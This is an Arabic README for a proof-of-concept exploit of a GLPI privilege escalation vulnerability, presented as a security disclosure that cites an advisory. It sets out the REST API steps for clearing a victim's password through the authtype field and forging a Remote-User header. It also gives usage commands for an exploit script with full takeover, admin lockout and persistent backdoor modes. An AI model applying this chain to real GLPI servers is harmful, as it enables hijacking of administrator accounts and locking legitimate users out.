
إثبات مفهوم لتصعيد الامتيازات في GLPI عبر التلاعب بـ authtype - CVE-2026-53625. إثبات مفهوم أخلاقي لثغرة GLPI التي تسمح لفني بالسيطرة الكاملة على أي حساب سوبر-أدمن عبر التلاعب بـ authtype في REST API.
يوفر هذا المستودع إثبات مفهوم أخلاقي (PoC) لثغرة CVE-2026-53625، وهي ثغرة تصعيد امتيازات بخطورة عالية في GLPI تؤثر على جميع الإصدارات من 0.70 حتى 11.0.7.
يمكن لمستخدم منخفض الامتيازات (فني) السيطرة الكاملة على أي حساب، بما في ذلك
حساب Super-Admin، من خلال التلاعب بحقل authtype عبر REST API.
تربط الهجمة ثلاث نقاط ضعف معًا لتحقيق استيلاء كامل على الحساب مع
إنشاء باب خلفي دائم.
النشرة الأمنية الرسمية: GHSA-94rp-v9f2-5rj7
لا يتحقق GLPI من مستويات الامتيازات عندما يحدّث مستخدم سجل مستخدم آخر عبر
REST API. حقل authtype غير محمي، وتغييره إلى
EXTERNAL يجعل GLPI يمسح كلمة مرور الضحية تلقائيًا.
وبالدمج مع ترويسة SSO قابلة للتزوير (Remote-User)، يتيح ذلك
استيلاءً كاملًا على الحساب.
POST /apirest.php/initSession)
GET /apirest.php/User)
authtype الخاص بالضحية إلى EXTERNAL (4) عبر
PUT /apirest.php/User/{id} — يقوم GLPI بمسح كلمة المرور تلقائيًا
(User.php:1277)
Remote-User: {victim} للحصول على جلسة
بصفة الضحية — دون الحاجة إلى كلمة مرور
بدون تفعيل SSO: لا تزال الهجمة تعمل كـ DoS — تُمسح كلمة مرور الضحية ويُمنَع من تسجيل الدخول. لا حاجة إلى SSO لتحقيق هذا الأثر.
إثبات المفهوم (PoC) هذا مخصص للأغراض التعليمية والاختبار المصرح به فقط. استخدمه فقط على الأنظمة التي تملكها أو التي لديك إذن صريح بشأنها. المؤلف والمساهمون غير مسؤولين عن أي إساءة استخدام.
استنساخ المستودع:
git clone https://github.com/7h30th3r0n3/CVE-2026-53625-GLPI-PoC.git
cd CVE-2026-53625-GLPI-PoC
الاعتماديات: bash، curl، python3، openssl
يدعم إثبات المفهوم (PoC) نمطين للهجوم:
# Full takeover chain (default) — requires SSO with forgeable header:
./poc_authtype_takeover.sh --auto http://glpi.local tech P@ss
# DoS only — lock out admin, no SSO needed:
./poc_authtype_takeover.sh --lockdown --auto http://glpi.local tech P@ss
# Safe mode — prove chain on sacrificial user, zero impact on real accounts:
./poc_authtype_takeover.sh --safe --verbose http://glpi.local tech P@ss
# Full takeover + restore victim afterward:
./poc_authtype_takeover.sh --backdoor --restore --restore-pass 'NewPass!' --auto http://glpi.local tech P@ss
شغّل ./poc_authtype_takeover.sh --help لمعرفة جميع الخيارات.
تم اكتشاف الثغرة وتطوير إثبات المفهوم (PoC) بواسطة 7h30th3r0n3.